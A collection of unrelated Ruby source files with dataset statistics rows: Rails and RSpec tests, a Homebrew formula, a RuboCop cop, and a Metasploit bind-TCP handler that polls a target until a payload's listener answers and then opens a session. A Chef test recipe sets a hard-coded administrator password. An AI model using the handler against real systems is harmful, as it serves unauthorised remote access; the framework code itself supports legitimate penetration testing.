    end
  end
  describe '#execute' do
    it 'removes the exported project file after the upload' do
      allow(strategy).to receive(:send_file)
      allow(strategy).to receive(:handle_response_error)
      expect(project).to receive(:remove_exports)
      strategy.execute(user, project)
    end
    context 'when upload fails' do
      it 'stores the export error' do
        stub_full_request(example_url, method: :post).to_return(status: [404, 'Page not found'])
        strategy.execute(user, project)
        errors = project.import_export_shared.errors
        expect(errors).not_to be_empty
        expect(errors.first).to eq "Error uploading the project. Code 404: Page not found"
      end
    end
  end
end
| 30.294118 | 96 | 0.688026 |
bf53558c746f058e5e5f7abecf00e1472657fba8 | 760 | require File.expand_path("../../Abstract/abstract-php-extension", __FILE__)
# Homebrew formula: builds the php-uv extension (libuv bindings) for PHP 7.0.
class Php70Uv < AbstractPhp70Extension
  init
  desc "interface to libuv library"
  homepage "https://github.com/bwoebi/php-uv"
  url "https://github.com/bwoebi/php-uv/archive/v0.1.1.tar.gz"
  sha256 "e576df44997a0b656deb4a1c2bfd1879fb3647419b0724bd6e87c7ddf997e2c1"
  head "https://github.com/bwoebi/php-uv.git"
  depends_on "libuv"
  def install
    # ENV.universal_binary if build.universal?
    # Prepare the extension source so it gains a ./configure script.
    safe_phpize
    system "./configure", "--prefix=#{prefix}",
                          phpconfig,
                          "--with-uv=#{Formula["libuv"].opt_prefix}"
    system "make"
    # Install only the compiled shared object; the ini snippet is opt-in below.
    prefix.install "modules/uv.so"
    write_config_file if build.with? "config-file"
  end
end
| 29.230769 | 75 | 0.677632 |
bba29de51b5421eae6c6ba67dc71cdece160df89 | 715 | require "rails_helper"
# Feature: a DfE Sign-in payroll operator downloads the generated payroll CSV.
RSpec.feature "Payroll run download" do
  scenario "User can download a payroll run file" do
    sign_in_to_admin_with_role(DfeSignIn::User::PAYROLL_OPERATOR_DFE_SIGN_IN_ROLE_CODE)
    # 2 StudentLoans claims + 1 MathsAndPhysics claim => 3 data rows expected.
    payroll_run = create(:payroll_run, claims_counts: {StudentLoans: 2, MathsAndPhysics: 1})
    visit new_admin_payroll_run_download_path(payroll_run)
    expect(page).to have_content "This month's payroll file is ready for processing."
    click_on "Download payroll file"
    click_on "Download #{payroll_run.created_at.strftime("%B")} payroll file"
    # The download is served as CSV with a header row (excluded from count).
    expect(page.response_headers["Content-Type"]).to eq("text/csv")
    csv = CSV.parse(body, headers: true)
    expect(csv.count).to eq(3)
  end
end
| 31.086957 | 92 | 0.751049 |
4aa84d5de18e24cfae44476d51e4f768193e6d76 | 787 | # == Schema Information
#
# Table name: gears
#
# @!attribute id
# @return []
# @!attribute armor
# @return [Integer]
# @!attribute description
# @return [String]
# @!attribute harm
# @return [Integer]
# @!attribute name
# @return [String]
# @!attribute created_at
# @return [Time]
# @!attribute updated_at
# @return [Time]
# @!attribute playbook_id
# @return []
#
# Indexes
#
# index_gears_on_playbook_id (playbook_id)
#
# Foreign Keys
#
# fk_rails_... (playbook_id => playbooks.id)
#
FactoryBot.define do
  # Default gear: a silver sword with modest harm/armor, linked to a playbook.
  factory :gear do
    name { "Sword" }
    description { "Silver sword" }
    harm { 2 }
    armor { 1 }
    playbook
    # Opt-in trait that tags the gear; tags are assigned after creation and
    # saved explicitly so they are persisted on the record.
    trait :with_tags do
      after(:create) do |gear|
        gear.tag_list = %w(heavy slow)
        gear.save
      end
    end
  end
end
| 17.108696 | 46 | 0.614994 |
18cfd4caa143eb32bf97342c214be4c99f82a1b8 | 281 | #!/usr/bin/env ruby
#
# Put description here
#
#
#
#
#
require 'swig_assert'
require 'template_rename'
# Smoke test: instantiate each renamed template specialization and call the
# renamed wrapper methods; a rename regression in the bindings raises here.
i = Template_rename::IFoo.new
d = Template_rename::DFoo.new
a = i.blah_test(4)
b = i.spam_test(5)
c = i.groki_test(6)
x = d.blah_test(7)
y = d.spam(8)
z = d.grok_test(9)
| 11.708333 | 29 | 0.658363 |
ac5feb298ae224bb14cb2af4c8d005763c65f50b | 490 | # Tests windows_ad::default
# Tests windows_ad::domain - create forest
include_recipe 'windows_ad::default'
# NOTE(review): test-fixture credentials are hard-coded in plain text; use an
# encrypted data bag or similar for anything beyond integration testing.
user = 'Administrator'
pass = 'Password1234###!'
domain = 'contoso.local'
# Ensure the local Administrator password matches the value used below.
execute "net user \"#{user}\" \"#{pass}\""
# Promote the node to the domain controller of a brand new forest.
windows_ad_domain domain do
  type 'forest'
  safe_mode_pass pass
  domain_pass pass
  domain_user user
  # DNS install options vary with the node's reported os_version; other
  # versions receive no explicit options.
  case node['os_version']
  when '6.1'
    options ({ 'InstallDNS' => 'yes' })
  when '6.2'
    options ({ 'InstallDNS' => nil })
  end
  action :create
end
| 19.6 | 42 | 0.673469 |
91b1f69687a77037baa0774538e59f238317f136 | 2,489 | # frozen_string_literal: true
#
# Copyright:: Copyright 2020, Chef Software Inc.
# Author:: Tim Smith (<[email protected]>)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module RuboCop
  module Cop
    module Chef
      module ChefCorrectness
        # The macos_userdefaults resource prior to Chef Infra Client 16.3 would silently continue if invalid types were passed resulting in unexpected behavior. Valid values are: "array", "bool", "dict", "float", "int", and "string".
        #
        # @example
        #
        #   # bad
        #   macos_userdefaults 'set a value' do
        #     global true
        #     key 'key'
        #     type 'boolean'
        #   end
        #
        #   # good
        #   macos_userdefaults 'set a value' do
        #     global true
        #     key 'key'
        #     type 'bool'
        #   end
        #
        class MacosUserdefaultsInvalidType < Base
          include RuboCop::Chef::CookbookHelpers
          extend RuboCop::Cop::AutoCorrector
          # Type values macos_userdefaults accepts.
          VALID_VALUES = %w(array bool dict float int string).freeze
          # Frequent misspellings we can safely autocorrect to a valid type.
          INVALID_VALUE_MAP = {
            'boolean' => 'bool',
            'str' => 'string',
            'integer' => 'int',
          }.freeze
          MSG = 'The macos_userdefaults resource prior to Chef Infra Client 16.3 would silently continue if invalid types were passed resulting in unexpected behavior. Valid values are: "array", "bool", "dict", "float", "int", and "string".'
          # Flag (and autocorrect when possible) invalid `type` property values
          # on macos_userdefaults resource blocks.
          def on_block(node)
            match_property_in_resource?(:macos_userdefaults, 'type', node) do |type|
              type_val = method_arg_ast_to_string(type)
              return if VALID_VALUES.include?(type_val)
              add_offense(type, message: MSG, severity: :refactor) do |corrector|
                # Only autocorrect spellings with a known valid replacement.
                next unless INVALID_VALUE_MAP[type_val]
                corrector.replace(type, "type '#{INVALID_VALUE_MAP[type_val]}'")
              end
            end
          end
        end
      end
    end
  end
end
| 36.602941 | 241 | 0.616714 |
7a4351b7f46ba070f922bb128c0acb2cb50520f4 | 498 | task :compile_licenses do
puts 'Compiling open source licenses via Yarn.'
output = 'public/LICENSE.txt'
`npx yarn licenses generate-disclaimer --silent > #{ output }`
additional_licenses = <<-HERE
-----
beige-tiles.png by SubtlePatterns and irongrip.png by Tony Kindard downloaded from toptal.com and released under the CC BY-SA 3.0 license, which can be found at https://creativecommons.org/licenses/by-sa/3.0/legalcode.
HERE
`echo "#{ additional_licenses }" >> #{ output }`
end
| 29.294118 | 218 | 0.726908 |
f8cd96586f3e7ef1de675373e5dd0044d03cccaf | 7,045 | # frozen_string_literal: true
# Routines for building and saving a course timeline after submission of wizard data
class WizardTimelineManager
###############
# Entry point #
###############
def self.update_timeline_and_tags(course, wizard_id, wizard_params)
new(course, wizard_id, wizard_params).update_timeline_and_tags
end
#############
# Main flow #
#############
def initialize(course, wizard_id, wizard_params)
@course = course
@output = wizard_params['wizard_output']['output'] || []
@logic = wizard_params['wizard_output']['logic'] || []
@tags = wizard_params['wizard_output']['tags'] || []
# Load the wizard content building blocks.
content_path = "#{Rails.root}/config/wizard/#{wizard_id}/content.yml"
@all_content = YAML.load_file(content_path)
@timeline = []
end
def update_timeline_and_tags
# Parse the submitted wizard data and collect selected content.
# @output is an array of strings that corresponds to the available
# output options in @all_content.
content_groups = @output.map do |content_key|
@all_content[content_key]
end
# Build a timeline array
build_timeline(content_groups)
# Create and save week/block objects based on the object generated above
save_timeline
# Save any tags that have been generated from this Wizard output
add_tags
end
###################
# Private methods #
###################
private
def build_timeline(content_groups)
available_weeks = @course.meetings_manager.open_weeks
return if available_weeks.zero?
@timeline = initial_weeks_and_weights(content_groups)
shorten_timeline_by_one_week until @timeline.size <= available_weeks
end
def initial_weeks_and_weights(content_groups)
content_groups.flatten.map do |week|
OpenStruct.new(weight: week['weight'],
blocks: week['blocks'])
end
end
# Find the two consecutive weeks with the lowest total weight, and combine
# then into a single week. This assumes at least two weeks in the timeline.
def shorten_timeline_by_one_week
week_pair_weights = {}
i = 0
@timeline.each_cons(2) do |week_pair|
week_pair_weights[i] = week_pair[0][:weight] + week_pair[1][:weight]
i += 1
end
lightest_weeks_index = week_pair_weights.min_by { |_first_week_index, weight| weight }[0]
squish_consecutive_weeks(lightest_weeks_index)
end
def squish_consecutive_weeks(first_week_index)
second_week_index = first_week_index + 1
@timeline[first_week_index][:weight] += @timeline[second_week_index][:weight]
@timeline[first_week_index][:blocks] += @timeline[second_week_index][:blocks]
@timeline.delete_at(second_week_index)
end
def save_timeline
@timeline.each_with_index do |week, week_index|
next if week[:blocks].blank?
week_record = Week.create(course_id: @course.id, order: week_index + 1)
week[:blocks].each_with_index do |block, block_index|
# Skip blocks with unmet 'if' dependencies
next unless if_dependencies_met?(block)
block['week_id'] = week_record.id
block['order'] = block_index + 1
save_block_and_gradeable(block)
end
end
end
def if_dependencies_met?(block)
if_met = !block.key?('if')
if_met ||= Array.wrap(block['if']).reduce(true) do |met, dep|
met && @logic.include?(dep)
end
if_met
end
def save_block_and_gradeable(block)
attr_keys_to_skip = %w[if graded points]
block_params = block.except(*attr_keys_to_skip)
block_record = Block.create(block_params)
add_handouts(block_record) if block_record.kind == Block::KINDS['handouts']
return unless block['graded']
gradeable = Gradeable.create(gradeable_item_id: block_record.id,
points: block['points'] || 10,
gradeable_item_type: 'block')
block_record.update(gradeable_id: gradeable.id)
end
# rubocop:disable Metrics/LineLength
HANDOUTS = {
'biographies_handout' => ['Biographies', 'https://wikiedu.org/biographies'],
'books_handout' => ['Books', 'https://wikiedu.org/books'],
'chemistry_handout' => ['Chemistry', 'https://wikiedu.org/chemistry'],
'cultural_anthropology_handout' => ['Cultural Anthropology', 'http://wikiedu.org/cultural_anthropology'],
'ecology_handout' => ['Ecology', 'https://wikiedu.org/ecology'],
'environmental_sciences_handout' => ['Environmental Sciences', 'https://wikiedu.org/environmental_sciences'],
'films_handout' => ['Films', 'https://wikiedu.org/films'],
'genes_and_proteins_handout' => ['Genes and Proteins', 'https://wikiedu.org/genes_and_proteins'],
'history_handout' => ['History', 'https://wikiedu.org/history'],
'LGBTplus_studies_handout' => ['LGBT+ Studies', 'http://wikiedu.org/lgbtplus_studies'],
'linguistics_handout' => ['Linguistics', 'https://wikiedu.org/linguistics'],
'medicine_handout' => ['Medicine', 'https://wikiedu.org/medicine'],
'political_science_handout' => ['Political Science', 'https://wikiedu.org/political_science'],
'psychology_handout' => ['Psychology', 'https://wikiedu.org/psychology'],
'science_communication_handout' => ['Science Communcation', 'https://wikiedu.org/science_communication'],
'sociology_handout' => ['Sociology', 'https://wikiedu.org/sociology'],
'species_handout' => ['Species', 'https://wikiedu.org/species'],
'womens_studies_handout' => ["Women's Studies", 'https://wikiedu.org/womens_studies']
}.freeze
# rubocop:enable Metrics/LineLength
def add_handouts(block)
content = +''
HANDOUTS.each_key do |logic_key|
next unless @logic.include?(logic_key)
content += link_to_handout(logic_key)
end
# Remove the block if it's empty; otherwise, update with content
content.blank? ? block.destroy : block.update(content: content)
end
# Renders a paragraph-wrapped anchor for one handout, using the display
# text and URL registered under +logic_key+ in HANDOUTS.
def link_to_handout(logic_key)
  entry = HANDOUTS[logic_key]
  link_text = entry[0]
  url = entry[1]
  <<~LINK
    <p>
      <a class="handout-link" href="#{url}" target="_blank">#{link_text}</a>
    </p>
  LINK
end
NONEXCLUSIVE_KEYS = ['topics'].freeze
# Persists the wizard's tag choices (@tags, an array of
# { key:, tag: } hashes) as Tag records on @course.
def add_tags
  @tags.each do |tag|
    # Only one tag for each tag key is allowed. Overwrite the previous tag if
    # one with the same key already exists, so that if a given choice is made
    # a second time, the tag gets updated to reflect the new choice.
    # NONEXCLUSIVE_KEYS are allowed to have multiple tags for one wizard key.
    # We make this work by using the wizard key and value together as the record key.
    wizard_key = tag[:key]
    tag_value = tag[:tag]
    tag_key = NONEXCLUSIVE_KEYS.include?(wizard_key) ? "#{wizard_key}-#{tag_value}" : wizard_key
    # Fetch once instead of the previous exists? + find_by pair: one query
    # fewer, and no window where the record vanishes between the two calls.
    existing_tag = Tag.find_by(course_id: @course.id, key: tag_key)
    if existing_tag
      existing_tag.update(tag: tag_value)
    else
      Tag.create(course_id: @course.id, tag: tag_value, key: tag_key)
    end
  end
end
end
| 37.275132 | 113 | 0.681192 |
8772f832d05c195a24bdde397732073b985033c2 | 4,558 | describe "{{helper context key=value}}" do
let(:global_helpers_providers) { [] }
describe "#compile" do
let(:post) { double("post") }
let(:presenter) { IntegrationTest::Presenter.new(double("view_context"), post: post) }
it "passes two arguments" do
template = Curlybars.compile(<<-HBS)
{{print_args_and_options 'first' 'second'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
first, second, key=
HTML
end
it "calls a helper without arguments in an if statement" do
template = Curlybars.compile(<<-HBS)
{{#if print_args_and_options}}
{{print_args_and_options 'first' 'second'}}
{{/if}}
HBS
expect(eval(template)).to resemble(<<-HTML)
first, second, key=
HTML
end
it "passes two arguments and options" do
template = Curlybars.compile(<<-HBS)
{{print_args_and_options 'first' 'second' key='value'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
first, second, key=value
HTML
end
it "renders a helper with expression and options" do
template = Curlybars.compile(<<-HBS)
{{date user.created_at class='metadata'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
<time datetime="2015-02-03T13:25:06Z" class="metadata">
February 3, 2015 13:25
</time>
HTML
end
it "renders a helper with only expression" do
template = Curlybars.compile(<<-HBS)
<script src="{{asset "jquery_plugin.js"}}"></script>
HBS
expect(eval(template)).to resemble(<<-HTML)
<script src="http://cdn.example.com/jquery_plugin.js"></script>
HTML
end
it "renders a helper with only options" do
template = Curlybars.compile(<<-HBS)
{{#with new_comment_form}}
{{input title class="form-control"}}
{{/with}}
HBS
expect(eval(template)).to resemble(<<-HTML)
<input name="community_post[title]"
id="community_post_title"
type="text"
class="form-control"
value="some value persisted in the DB">
HTML
end
it "renders correctly a return type of integer" do
template = Curlybars.compile(<<-HBS)
{{integer 'ignored'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
0
HTML
end
it "renders correctly a return type of boolean" do
template = Curlybars.compile(<<-HBS)
{{boolean 'ignored'}}
HBS
expect(eval(template)).to resemble(<<-HTML)
true
HTML
end
it "handles correctly a method that invokes `yield`, returning empty string" do
template = Curlybars.compile(<<-HBS)
{{this_method_yields}}
HBS
expect(eval(template)).to resemble("")
end
it "doesn't render if the path returns a presenter" do
template = Curlybars.compile(<<-HBS)
{{user}}
HBS
expect(eval(template)).to resemble("")
end
it "doesn't render if the path returns a collection of presenters" do
template = Curlybars.compile(<<-HBS)
{{array_of_users}}
HBS
expect(eval(template)).to resemble("")
end
end
describe "#validate" do
it "with errors" do
dependency_tree = {}
source = <<-HBS
{{helper}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).not_to be_empty
end
it "raises when using a partial as an helper" do
dependency_tree = { partial: :partial }
source = <<-HBS
{{partial}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).not_to be_empty
end
it "without errors" do
dependency_tree = { helper: :helper }
source = <<-HBS
{{helper}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).to be_empty
end
it "validates {{helper.invoked_on_nil}} with errors" do
dependency_tree = { helper: :helper }
source = <<-HBS
{{helper.invoked_on_nil}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).not_to be_empty
end
describe "with context" do
it "without errors in block_helper" do
dependency_tree = { helper: :helper, context: nil }
source = <<-HBS
{{helper context}}
HBS
errors = Curlybars.validate(dependency_tree, source)
expect(errors).to be_empty
end
end
end
end
| 24.374332 | 90 | 0.596534 |
ed91f62c4fa4f5b77b1ae221c825aa5a93e3a4f6 | 6,152 | # -*- coding: binary -*-
module Msf
module Handler

###
#
# This module implements the Bind TCP handler. This means that
# it will attempt to connect to a remote host on a given port for a period of
# time (typically the duration of an exploit) to see if the payload has
# started listening. This can tend to be rather verbose in terms of traffic
# and in general it is preferable to use reverse payloads.
#
###
module BindTcp

  include Msf::Handler

  #
  # Returns the handler specific string representation, in this case
  # 'bind_tcp'.
  #
  def self.handler_type
    return "bind_tcp"
  end

  #
  # Returns the connection oriented general handler type, in this case bind.
  #
  def self.general_handler_type
    "bind"
  end

  # A string suitable for displaying to the user
  #
  # @return [String]
  def human_name
    "bind TCP"
  end

  #
  # Initializes a bind handler and adds the options common to all bind
  # payloads, such as local port.
  #
  def initialize(info = {})
    super

    # RHOST is optional at registration time; a concrete host can be
    # supplied later through #add_handler's datastore overrides.
    register_options(
      [
        Opt::LPORT(4444),
        OptAddress.new('RHOST', [false, 'The target address', '']),
      ], Msf::Handler::BindTcp)

    self.conn_threads = []
    self.listener_threads = []
    self.listener_pairs = {}
  end

  #
  # Kills off the connection threads if there are any hanging around.
  #
  def cleanup_handler
    # Kill any remaining handle_connection threads that might
    # be hanging around
    conn_threads.each { |thr|
      thr.kill
    }
  end

  #
  # Starts a new connecting thread
  #
  # @param opts [Hash] datastore overrides (e.g. 'RHOST'/'LPORT') merged
  #   in before the new handler thread is started.
  #
  def add_handler(opts={})
    # Merge the updated datastore values
    opts.each_pair do |k,v|
      datastore[k] = v
    end

    # Start a new handler
    start_handler
  end

  #
  # Starts monitoring for an outbound connection to become established.
  #
  def start_handler
    # Maximum number of seconds to run the handler (overridable via the
    # exploit's 'active_timeout' configuration)
    ctimeout = 150

    if (exploit_config and exploit_config['active_timeout'])
      ctimeout = exploit_config['active_timeout'].to_i
    end

    # Take a copy of the datastore options
    rhost = datastore['RHOST']
    lport = datastore['LPORT']

    # Ignore this if one of the required options is missing
    return if not rhost
    return if not lport

    # Only try the same host/port combination once
    phash = rhost + ':' + lport.to_s
    return if self.listener_pairs[phash]
    self.listener_pairs[phash] = true

    # Start a new handling thread
    self.listener_threads << framework.threads.spawn("BindTcpHandlerListener-#{lport}", false) {
      client = nil

      print_status("Started #{human_name} handler against #{rhost}:#{lport}")

      if (rhost == nil)
        raise ArgumentError,
          "RHOST is not defined; bind stager cannot function.",
          caller
      end

      # Poll the target until a TCP connection is established or ctimeout
      # seconds have elapsed.
      stime = Time.now.to_i

      while (stime + ctimeout > Time.now.to_i)
        begin
          client = Rex::Socket::Tcp.create(
            'PeerHost' => rhost,
            'PeerPort' => lport.to_i,
            'Proxies' => datastore['Proxies'],
            'Context' =>
              {
                'Msf' => framework,
                'MsfPayload' => self,
                'MsfExploit' => assoc_exploit
              })
        rescue Rex::ConnectionError => e
          # Expected while the payload's listener is not yet up
          vprint_error(e.message)
        rescue
          wlog("Exception caught in bind handler: #{$!.class} #{$!}")
        end

        break if client

        # Wait half a second before polling the port again
        Rex::ThreadSafe.sleep(0.5)
      end

      # Valid client connection?
      if (client)
        # Increment the pending connection counter
        self.pending_connections += 1

        # Timeout and datastore options need to be passed through to the client
        opts = {
          :datastore => datastore,
          :expiration => datastore['SessionExpirationTimeout'].to_i,
          :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
          :retry_total => datastore['SessionRetryTotal'].to_i,
          :retry_wait => datastore['SessionRetryWait'].to_i
        }

        # Start a new thread and pass the client connection
        # as the input and output pipe. Client's are expected
        # to implement the Stream interface.
        conn_threads << framework.threads.spawn("BindTcpHandlerSession", false, client) { |client_copy|
          begin
            handle_connection(wrap_aes_socket(client_copy), opts)
          rescue
            elog("Exception raised from BindTcp.handle_connection: #{$!}")
          end
        }
      else
        wlog("No connection received before the handler completed")
      end
    }
  end

  # Wraps the session socket with AES-128-CFB8 encryption when the payload
  # is a Java payload ('java/' in PAYLOAD) and AESPassword is set;
  # otherwise the socket is returned unchanged.
  #
  # The key is the MD5 digest of AESPassword. Two pump threads shuttle
  # data between the real socket and one end of an in-process socket
  # pair; the caller receives the plaintext end (socks[1]).
  #
  # NOTE(review): the leading [0] word and random IV written first are
  # presumably the stream header the Java stager expects — confirm
  # against the payload side before changing.
  def wrap_aes_socket(sock)
    if datastore["PAYLOAD"] !~ /java\// or (datastore["AESPassword"] || "") == ""
      return sock
    end

    socks = Rex::Socket::tcp_socket_pair()
    socks[0].extend(Rex::Socket::Tcp)
    socks[1].extend(Rex::Socket::Tcp)

    m = OpenSSL::Digest.new('md5')
    m.reset
    key = m.digest(datastore["AESPassword"] || "")

    # Encrypting pump: plaintext from the socket pair -> AES -> wire.
    Rex::ThreadFactory.spawn('AESEncryption', false) {
      c1 = OpenSSL::Cipher.new('aes-128-cfb8')
      c1.encrypt
      c1.key=key
      sock.put([0].pack('N'))
      sock.put(c1.iv=c1.random_iv)
      buf1 = socks[0].read(4096)
      while buf1 and buf1 != ""
        sock.put(c1.update(buf1))
        buf1 = socks[0].read(4096)
      end
      sock.close()
    }

    # Decrypting pump: ciphertext from the wire -> AES -> socket pair.
    # Blocks until the peer's full 16-byte IV has been read.
    Rex::ThreadFactory.spawn('AESEncryption', false) {
      c2 = OpenSSL::Cipher.new('aes-128-cfb8')
      c2.decrypt
      c2.key=key
      iv=""
      while iv.length < 16
        iv << sock.read(16-iv.length)
      end
      c2.iv = iv
      buf2 = sock.read(4096)
      while buf2 and buf2 != ""
        socks[0].put(c2.update(buf2))
        buf2 = sock.read(4096)
      end
      socks[0].close()
    }

    return socks[1]
  end

  #
  # Stops all active listener threads and clears the dedupe table so the
  # same host/port pair can be handled again later.
  #
  def stop_handler
    # Stop the listener threads
    self.listener_threads.each do |t|
      t.kill
    end
    self.listener_threads = []
    self.listener_pairs = {}
  end

protected

  attr_accessor :conn_threads # :nodoc:
  attr_accessor :listener_threads # :nodoc:
  attr_accessor :listener_pairs # :nodoc:

end
end
end
| 25.213115 | 103 | 0.612809 |
79081a7e78321097dfb172a24c5981b3e439ddc7 | 474 | # This code was automatically generated using xdrgen
# DO NOT EDIT or your changes may be overwritten
require 'xdr'
# === xdr source ============================================================
#
# union switch (int v) {
# case 0:
# void;
# }
#
# ===========================================================================
module Vixal
  class AccountEntry
    # Extension union for AccountEntry, generated by xdrgen from the XDR
    # union shown in the header comment above (file says DO NOT EDIT).
    class Ext < XDR::Union
      # Discriminant is a plain XDR int exposed as :v
      switch_on XDR::Int, :v

      # Only v == 0 is defined, carrying no payload (void arm reserved
      # for future extension)
      switch 0
    end
  end
end
| 19.75 | 77 | 0.424051 |
014a1bae48984fa9295cd77d9e449da2e5e4c444 | 506 | require 'test_helper'
class EasyPayHelperTest < Test::Unit::TestCase
  include ActiveMerchant::Billing::Integrations

  # Builds a fresh helper before every test: order id 123 against the
  # 'test_account' merchant, amount 500, signed with 'secret'.
  def setup
    @helper = EasyPay::Helper.new(123, 'test_account', amount: 500, secret: 'secret')
  end

  # The constructor arguments must surface as EasyPay's expected form
  # fields (merchant number, sum and order number).
  def test_basic_helper_fields
    assert_field 'EP_MerNo', 'test_account'
    assert_field 'EP_Sum', '500'
    assert_field 'EP_OrderNo', '123'
  end

  # The request signature source string is merchant id, secret, order id
  # and amount concatenated in that order.
  def test_request_signature_string
    assert_equal 'test_accountsecret123500', @helper.request_signature_string
  end
end
| 25.3 | 91 | 0.745059 |
ac3c54092cde2dff3826a48535bbb6ab61f0bcbc | 199 | # frozen_string_literal: true
require 'forwardable'
module Signalwire::Relay::Calling
  # Action wrapper for a Relay "connect" operation.
  class ConnectAction < Action
    # Builds the action's outcome object.
    # NOTE(review): assumes @component is populated by the Action
    # superclass (not visible here) — confirm.
    #
    # @return [ConnectResult] result wrapping the underlying component
    def result
      ConnectResult.new(component: @component)
    end
  end
end
| 16.583333 | 46 | 0.738693 |
bf0307a64745d6af6c6f833d2b8f862d111c299d | 47 | task(:default).clear.enhance(%i[rubocop spec])
| 23.5 | 46 | 0.744681 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.